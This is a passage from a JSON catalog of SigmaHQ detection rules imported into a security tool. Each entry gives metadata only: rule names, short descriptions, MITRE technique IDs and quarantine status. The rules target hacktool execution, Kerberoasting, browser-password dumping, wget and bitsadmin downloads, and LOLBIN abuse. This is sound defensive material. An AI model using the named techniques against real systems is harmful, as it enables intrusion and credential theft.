Manipulation Rules", "description": "Detects when suspicious rules that delete or move messages or folders are set on a user's inbox.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-inbox-manipulation-rules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ceb55fd0-726e-4656-bf4e-b585b7f7d572", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml" } }, { "id": "sigmahq-sigma-cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "type": "detection", "name": "OpenWith.exe Executes Specified Binary", "description": "Detects OpenWith.exe executing another binary specified on its command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/openwith-exe-executes-specified-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml" } }, { "id": 
"sigmahq-sigma-cef24b90-dddc-4ae1-a09a-8764872f69fc", "type": "detection", "name": "Suspicious Get Local Groups Information", "description": "Detects the use of PowerShell modules and cmdlets to gather local group information.\nAdversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-local-groups-information.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" } }, { "id": "sigmahq-sigma-cf0c254b-22f1-4b2b-8221-e137b3c0af94", "type": "detection", "name": "HackTool - Impersonate Execution", "description": "Detects execution of the Impersonate tool. 
It can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-impersonate-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml" } }, { "id": "sigmahq-sigma-cf1dbc6b-6205-41b4-9b88-a83980d2255b", "type": "detection", "name": "Okta API Token Revoked", "description": "Detects when an Okta API token is revoked.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-api-token-revoked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_api_token_revoked.yml" } }, { "id": "sigmahq-sigma-cf2e938e-9a3e-4fe8-a347-411642b28a9f", "type": "detection", "name": "Potential PowerShell Execution Policy 
Tampering - ProcCreation", "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-execution-policy-tampering-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml" } }, { "id": "sigmahq-sigma-cf610c15-ed71-46e1-bdf8-2bd1a99de6c4", "type": "detection", "name": "Download File To Potentially Suspicious Directory Via Wget", "description": "Detects the use of wget to download content to a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/download-file-to-potentially-suspicious-directory-via-wget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf610c15-ed71-46e1-bdf8-2bd1a99de6c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml" } }, { "id": "sigmahq-sigma-cf93e05e-d798-4d9e-b522-b0248dc61eaf", "type": "detection", "name": "HackTool - SharpChisel Execution", "description": "Detects usage of the Sharp Chisel via the command-line arguments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpchisel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml" } }, { "id": "sigmahq-sigma-cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", "type": "detection", "name": "Suspicious Git Clone - Linux", "description": "Detects execution of \"git\" in order to clone a remote repository that contains suspicious keywords", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1593.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-git-clone-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml" } }, { "id": "sigmahq-sigma-cfeed607-6aa4-4bbd-9627-b637deb723c8", "type": "detection", "name": "New or Renamed User Account with '$' Character", "description": "Detects the creation of a user with the \"$\" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-or-renamed-user-account-with-character.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" } }, { "id": "sigmahq-sigma-d00a9a72-2c09-4459-ad03-5e0a23351e36", "type": "detection", "name": "Suspicious LDAP-Attributes Used", "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1001.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 
"path": "detections/sigma-imports/_quarantine/suspicious-ldap-attributes-used.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" } }, { "id": "sigmahq-sigma-d042284c-a296-4988-9be5-f424fadcc28c", "type": "detection", "name": "Suspicious Execution of InstallUtil Without Log", "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-installutil-without-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d042284c-a296-4988-9be5-f424fadcc28c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml" } }, { "id": "sigmahq-sigma-d047726b-c71c-4048-a99b-2e2f50dc107d", "type": "detection", "name": "Kavremover Dropped Binary LOLBIN Usage", "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kavremover-dropped-binary-lolbin-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_kavremover_uncommon_execution.yml" } }, { "id": "sigmahq-sigma-d04ae2b8-ad54-4de0-bd87-4bc1da66aa59", "type": "detection", "name": "Kerberoasting Activity - Initial Query", "description": "This rule will collect the data needed to start looking into possible kerberoasting activity.\nFurther analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds.\nYou can then set a threshold for the number of requests and time between the requests to turn this into an alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kerberoasting-activity-initial-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d04ae2b8-ad54-4de0-bd87-4bc1da66aa59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_kerberoasting_activity.yml" } }, { "id": "sigmahq-sigma-d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "type": "detection", "name": "File Download Via Bitsadmin", "description": "Detects usage of bitsadmin downloading a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" } }, { "id": "sigmahq-sigma-d06be4b9-8045-428b-a567-740a26d9db25", "type": "detection", "name": "Verclsid.exe Runs COM Object", "description": "Detects when verclsid.exe is used to run COM object via GUID", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/verclsid-exe-runs-com-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d06be4b9-8045-428b-a567-740a26d9db25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" } }, { "id": "sigmahq-sigma-d08722cd-3d09-449a-80b4-83ea2d9d4616", "type": "detection", "name": "Hidden Files and Directories", "description": "Detects an adversary creating a hidden file or directory, by detecting directories or files with . as the first character", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-files-and-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d08722cd-3d09-449a-80b4-83ea2d9d4616", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_hidden_files_directories.yml" } }, { "id": "sigmahq-sigma-d08a2711-ee8b-4323-bdec-b7d85e892b31", "type": "detection", "name": "PUA - CsExec Execution", "description": "Detects the use of the lesser-known remote execution tool named CsExec, a PsExec alternative", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-csexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"d08a2711-ee8b-4323-bdec-b7d85e892b31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_csexec.yml" } }, { "id": "sigmahq-sigma-d08dd86f-681e-4a00-a92c-1db218754417", "type": "detection", "name": "MSSQL XPCmdshell Option Change", "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-xpcmdshell-option-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d08dd86f-681e-4a00-a92c-1db218754417", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml" } }, { "id": "sigmahq-sigma-d0d2f720-d14f-448d-8242-51ff396a334e", "type": "detection", "name": "HackTool - Generic Process Access", "description": "Detects process access requests from hacktool processes based on their default image name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-generic-process-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d0d2f720-d14f-448d-8242-51ff396a334e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_generic_access.yml" } }, { "id": "sigmahq-sigma-d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "type": "detection", "name": "PUA - WebBrowserPassView Execution", "description": "Detects the execution of WebBrowserPassView.exe, a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-webbrowserpassview-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_webbrowserpassview.yml" } }, { "id": "sigmahq-sigma-d102b8f5-61dc-4e68-bd83-9a3187c67377", "type": "detection", "name": "Renamed VsCode Code Tunnel Execution - File Indicator", "description": "Detects the creation of a file with the name \"code_tunnel.json\" which indicates execution and usage of the VsCode tunneling utility by an \"Image\" or \"Process\" other than VsCode.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-vscode-code-tunnel-execution-file-indicator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d102b8f5-61dc-4e68-bd83-9a3187c67377", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml" } }, { "id": "sigmahq-sigma-d13c43f0-f66b-4279-8b2c-5912077c1780", "type": "detection", "name": "CLR DLL Loaded Via Office Applications", "description": "Detects CLR DLL being loaded by an Office Product", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clr-dll-loaded-via-office-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d13c43f0-f66b-4279-8b2c-5912077c1780", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_dotnet_clr_dll_load.yml" } }, { "id": "sigmahq-sigma-d20ee2f4-822c-4827-9e15-41500b1fff10", "type": "detection", "name": "Potential Amazon SSM Agent Hijacking", "description": "Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amazon-ssm-agent-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d20ee2f4-822c-4827-9e15-41500b1fff10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml" } }, { "id": "sigmahq-sigma-d2125259-ddea-4c1c-9c22-977eb5b29cf0", "type": "detection", "name": "New Root Certificate Installed Via Certutil.EXE", "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-root-certificate-installed-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml" } }, { "id": "sigmahq-sigma-d21374ff-f574-44a7-9998-4a8c8bf33d7d", "type": "detection", "name": "WmiPrvSE Spawned A Process", "description": "Detects WmiPrvSE spawning a process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/wmiprvse-spawned-a-process.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" } }, { "id": "sigmahq-sigma-d223b46b-5621-4037-88fe-fda32eead684", "type": "detection", "name": "New Root or CA or AuthRoot Certificate to Store", "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-root-or-ca-or-authroot-certificate-to-store.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d223b46b-5621-4037-88fe-fda32eead684", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" } }, { "id": "sigmahq-sigma-d22b4df4-5a67-4859-a578-8c9a0b5af9df", "type": "detection", "name": "Azure Network Security Configuration Modified or Deleted", "description": "Identifies when a network security configuration is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-network-security-configuration-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-d22df9cd-2aee-4089-93c7-9dc4eae77f2c", "type": "detection", "name": "ISATAP Router Address Was Set", "description": "Detects the configuration of a new ISATAP router on a Windows host. 
While ISATAP is a legitimate Microsoft technology for IPv6 transition, unexpected or unauthorized ISATAP router configurations could indicate a potential IPv6 DNS Takeover attack using tools like mitm6.\nIn such attacks, adversaries advertise themselves as DHCPv6 servers and set malicious ISATAP routers to intercept traffic.\nThis detection should be correlated with network baselines and known legitimate ISATAP deployments in your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1557", "T1565.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/isatap-router-address-was-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d22df9cd-2aee-4089-93c7-9dc4eae77f2c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_Iphlpsvc/win_system_isatap_router_address_set.yml" } }, { "id": "sigmahq-sigma-d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "type": "detection", "name": "XBAP Execution From Uncommon Locations Via PresentationHost.EXE", "description": "Detects the execution of \".xbap\" (Browser Applications) files via PresentationHost.EXE from an uncommon location. 
These files can be abused to run malicious \".xbap\" files and bypass AWL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/xbap-execution-from-uncommon-locations-via-presentationhost-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml" } }, { "id": "sigmahq-sigma-d2451be2-b582-4e15-8701-4196ac180260", "type": "detection", "name": "Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE", "description": "Detects potential DLL side loading of \"KeyScramblerIE.dll\" by \"KeyScrambler.exe\".\nVarious threat actors and malware have been found side loading a masqueraded \"KeyScramblerIE.dll\" through \"KeyScrambler.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-keyscramblerie-dll-via-keyscrambler-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 